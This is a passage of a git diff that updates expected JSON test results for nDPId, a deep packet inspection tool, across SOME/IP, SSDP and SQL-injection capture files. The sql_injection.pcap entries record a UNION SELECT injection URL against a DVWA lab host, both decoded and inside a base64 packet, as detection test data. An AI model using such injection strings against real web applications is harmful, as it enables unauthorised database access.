+00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1433332443506,"flow_last_seen":1433332443605,"flow_idle_time":200000,"flow_min_l4_payload_len":1176,"flow_max_l4_payload_len":1412,"flow_tot_l4_payload_len":12472,"flow_avg_l4_payload_len":1385,"midstream":0,"thread_ts_msec":1433332443605,"l3_proto":"ip4","src_ip":"10.0.1.207","dst_ip":"10.0.1.1","src_port":56772,"dst_port":18193,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"someip-tp.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":12472,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1433332443605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869704 bytes -~~ total memory freed........: 5869704 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003338 bytes +~~ total memory freed........: 6003338 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2358 chars diff --git a/test/results/someip-udp-method-call.pcapng.out b/test/results/someip-udp-method-call.pcapng.out index 56f3414a1..088e214ae 100644 --- a/test/results/someip-udp-method-call.pcapng.out +++ b/test/results/someip-udp-method-call.pcapng.out @@ -2,13 +2,13 @@ 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1502789275686} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1502789275686,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1502789275686,"pkt":"AQBeAAABdAAAAAC5CABFAAFkAHhAAAER12bAqAAB4AAAAcAmwCYBULPJ\/\/+BAAAAAUAAAAfdAQECAMAAAAAAAADAAQAAIBI0APwBAAADAAAAAAECABAAAAABAQAAAwAAAAIBAwAQAAAAAQEAAAMAAAAAAQQAIAAAAAEBAAADAAAAAAEGABAAAAABAQAAAwAAAAEBAQAQAAAAAQEAAAMAAAAAAQAAIAAAAAEBAAADAAAAAAEBABAAAAABAgAAAwAAAAABAQAQAAAAAQEAAAMAAAAAAQEAEAAAAAEBAAADAAAAAAEHABAAAAABAQAAAwAAAAEBCAAQAAAAAQEAAAMAAAAAAAAAbAAJBADAqAABAAbAMQAJBADAqAABABHAMQAJBADAqAABAAbAPwAJBADAqAABAAbAPwAJBADAqAABAAbAPwAJBADAqAABABHAPwAJBADAqAABABHAPwAJBADAqAABAAbAPwAJBADAqAABABHAPw=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275686,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1502789275711,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1502789275711,"pkt":"dAAAAAC5gAAAAAB1CABFAAA1AAAAAAERN+rAqAB9wKgAAcAnwDEAIefYEjQACAAAABEAAAABAQEAAAAAAAWrq6urqw=="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502789275711,"flow_last_seen":1502789275711,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275711,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1502789275713,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1502789275713,"pkt":"gAAAAAB1dAAAAAC5CABFAAA1do9AAAERgVrAqAABwKgAfcAxwCcAIWfYEjQACAAAABEAAAABAQGAAAAAAAWrq6urqw=="} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1502789275711,"flow_last_seen":1502789275713,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1502789275711,"flow_last_seen":1502789275713,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.125","dst_ip":"192.168.0.1","src_port":49191,"dst_port":49201,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1502789275686,"flow_last_seen":1502789275686,"flow_idle_time":200000,"flow_min_l4_payload_len":328,"flow_max_l4_payload_len":328,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1502789275713,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"224.0.0.1","src_port":49190,"dst_port":49190,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SOMEIP","breed":"Acceptable","category":"RPC"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"someip-udp-method-call.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-payload-len":378,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1502789275713} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 @@ -18,9 +18,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870562 bytes -~~ total memory freed........: 5870562 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6004196 bytes +~~ total memory freed........: 6004196 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 480 chars ~~ json string max len.......: 898 chars diff --git a/test/results/someip_sd_sample.pcap.out b/test/results/someip_sd_sample.pcap.out index c315a056c..74a17a303 100644 --- a/test/results/someip_sd_sample.pcap.out +++ b/test/results/someip_sd_sample.pcap.out @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 209 chars ~~ json string max len.......: 564 chars diff --git a/test/results/sql_injection.pcap.out b/test/results/sql_injection.pcap.out index 9a0e7b0db..bb435c641 100644 --- a/test/results/sql_injection.pcap.out +++ b/test/results/sql_injection.pcap.out @@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1655243907401} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01398{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":757,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":757,"pkt_l4_len":723,"thread_ts_msec":1655243907401,"pkt":"FE+Kc3lP4CvpcxhCCABFAALnBMxAAEAGqxzAqANtwKgDa9EYAFBtgZhQ14snP4AYAfYjSgAAAQEICpBN+1KzuubyR0VUIC9EVldBLW1hc3Rlci92dWxuZXJhYmlsaXRpZXMvc3FsaS8\/aWQ9JTNGaWQlM0RhJTI3K1VOSU9OK1NFTEVDVCslMjJ0ZXh0MSUyMiUyQyUyMnRleHQyJTIyJTNCLS0rLSUyNlN1Ym1pdCUzRFN1Ym1pdCZTdWJtaXQ9U3VibWl0IEhUVFAvMS4xDQpIb3N0OiAxOTIuMTY4LjMuMTA3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMDIuMC4wLjAgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjkNClJlZmVyZXI6IGh0dHA6Ly8xOTIuMTY4LjMuMTA3L0RWV0EtbWFzdGVyL3Z1bG5lcmFiaWxpdGllcy9zcWxpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGl0LUlULGl0O3E9MC45LGVuLVVTO3E9MC44LGVuO3E9MC43DQpDb29raWU6IFBIUFNFU1NJRD11YTdvdW1xY2g0aDJxZWx1YnB2bzIxZGVjNjsgc2VjdXJpdHk9bG93DQoNCg=="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/sqli\/?id=%3Fid%3Da%27+UNION+SELECT+%22text1%22%2C%22text2%22%3B--+-%26Submit%3DSubmit&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655243907401,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":1,"thread_ts_msec":1655243907401,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.3.107","url":"192.168.3.107\/DVWA-master\/vulnerabilities\/sqli\/?id=%3Fid%3Da%27+UNION+SELECT+%22text1%22%2C%22text2%22%3B--+-%26Submit%3DSubmit&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.0.0 Safari\/537.36"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1655243907401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655243907401,"pkt":"4CvpcxhCFE+Kc3lPCABFAAA0VvpAAEAGW6HAqANrwKgDbQBQ0RjXiyc\/bYGbA4AQAfhcQgAAAQEICrO7eEWQTftS"} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1655243907402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1655243907402,"pkt":"4CvpcxhCFE+Kc3lPCABFAAXcVvtAAEAGVfjAqANrwKgDbQBQ0RjXiyc\/bYGbA4AQAfjDwgAAAQEICrO7eEeQTftSSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBUdWUsIDE0IEp1biAyMDIyIDIxOjU4OjI3IEdNVA0KU2VydmVyOiBBcGFjaGUvMi40LjQxIChVYnVudHUpDQpFeHBpcmVzOiBUdWUsIDIzIEp1biAyMDA5IDEyOjAwOjAwIEdNVA0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUsIG11c3QtcmV2YWxpZGF0ZQ0KUHJhZ21hOiBuby1jYWNoZQ0KVmFyeTogQWNjZXB0LUVuY29kaW5nDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQpDb250ZW50LUxlbmd0aDogMTM3NQ0KS2VlcC1BbGl2ZTogdGltZW91dD01LCBtYXg9MTAwDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IHRleHQvaHRtbDtjaGFyc2V0PXV0Zi04DQoNCh+LCAAAAAAAAAOlWP9P2zgU\/7lI+x98Pmls0yU+kE46sSQTUBg9sY0tsN1JJ1VO4rYGJ\/Fsp13vr79nO2kDg5UVCRH7+fnj5\/fdjX4Zfji+\/OfiBM1MKZKdnch+kaDVNMasCt4eYSAOohmjRbIzGEQlMxR4jQzY14bPY3xcV4ZVJrhcSoZR7mcxNuybIRbrNcpnVGlm4qvL0+BPjIgFHESGG8GSz42omKIZF9wsD1D68RyNqmuWG15X6OAADWlZoY5JMPSFZehQSsFz6lheDD9\/OXyJ5nvh3u\/o1ZDNmahlCRK8iog\/wR0meHWDFBMx1mYpmJ4xZjAyIHIraa41RjPFJjEOQwJ\/xXxBLZWUlFehWyZ3sTjctkP5l5d0ygiQbuNM6NyyhW6hRdC54tL0j7+mc+qpGGmV3xLiWrvvBcCH1xonEfGczi7EGwZGWV0sUS6o1jGe1SXDzlwFnyNexNjaBS7ClDNnb8HuX1EHES+n3wngbqaJqKd1KKspRlSAgTdYprssiAhH3TnU6nQMVmpW5363Mpa0KFjhbgHrjejuZhePRJ3fWFUI3pFhQm8pPsTJGaghIhQ0Jniy8yNmXmmjGud1OpQziZNRj\/I4DHDxRvrNqR0igj4xIKLhUQ+ANCLZ4jbzXpxwMEamGsMITo7sF53WKn\/kTe8CsW8sB5zjuixpVayDbzu0XKuJRUs\/nW4HMOEkfCPB32Je5aIpmFfoKQcPG1mK3lq2RoqaFqQFu3KzLW9JpYGkRpyXsLxRDB0fXlwenx3ei6eZAJ1aX96Aq78KDqC3kuB2ElqkcQaZqriLh14cWfLL7XAXjN6MuQX9AiOUMm3tgUbDR8bIXbxvWo8t2t9pCqn8w7stxbIwqoP5xCZe308A0x1Yamq1NVKupQuGC3S0lLBlO5R1bQCwv2CSusnTc4pzXSi7PsRsIQWDetLjJIV9vJrUfv\/F2QV42aR+3Faa1Y3xGw\/t8Om3seWpgzx34zuYvpD0qtFDhclW0q4wPdtxa+2hdmVVmJ7Ztmjvhx0MlOc94LOcPZT5qmiO87pgY6oYdXCDaFKrElG3N8a\/YgTd1qwGud6eXHqOQST9d3ClmYLAO2jrdiWbfkcBbQT\/D8Z7f2BU0RJGfFVL+7y6yUpuOp60nc2paNbT9mAikx0nJLFSenmlYgnIgN6A8uguuno\/+vAepSfnJ8eXyMmxh39z3338OghQ8NxDxv4TZQq6hFOutHECHCC3xZPTRq1p+3A6HGUV6azmdTrbT95BeDq3UyVtNb7v2MDgz3y3tnYU27bqA0JYFS74DZes4DSs1ZTYGQHLjXlnOWjrqJpC04ohjdLqBic\/sXnleA9KsFgswooZLam6YSrM65Jk4MCQX7OgC0ubxIMVZpBDp2YC17mSh6V7IvBmyesF1dLfe7EIAL9sKotJjaEQo04Ro81a\/CmYzVJldZYtA2NjSrtLP3w="} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655243907401,"flow_last_seen":1655243907406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":483,"midstream":1,"thread_ts_msec":1655243907406,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655243907401,"flow_last_seen":1655243907406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":483,"midstream":1,"thread_ts_msec":1655243907406,"l3_proto":"ip4","src_ip":"192.168.3.109","dst_ip":"192.168.3.107","src_port":53528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"sql_injection.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":2418,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1655243907406} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869880 bytes -~~ total memory freed........: 5869880 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003514 bytes +~~ total memory freed........: 6003514 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2432 chars diff --git a/test/results/ssdp-m-search-ua.pcap.out b/test/results/ssdp-m-search-ua.pcap.out index 527046583..ee5e804f6 100644 --- a/test/results/ssdp-m-search-ua.pcap.out +++ b/test/results/ssdp-m-search-ua.pcap.out @@ -2,10 +2,10 @@ 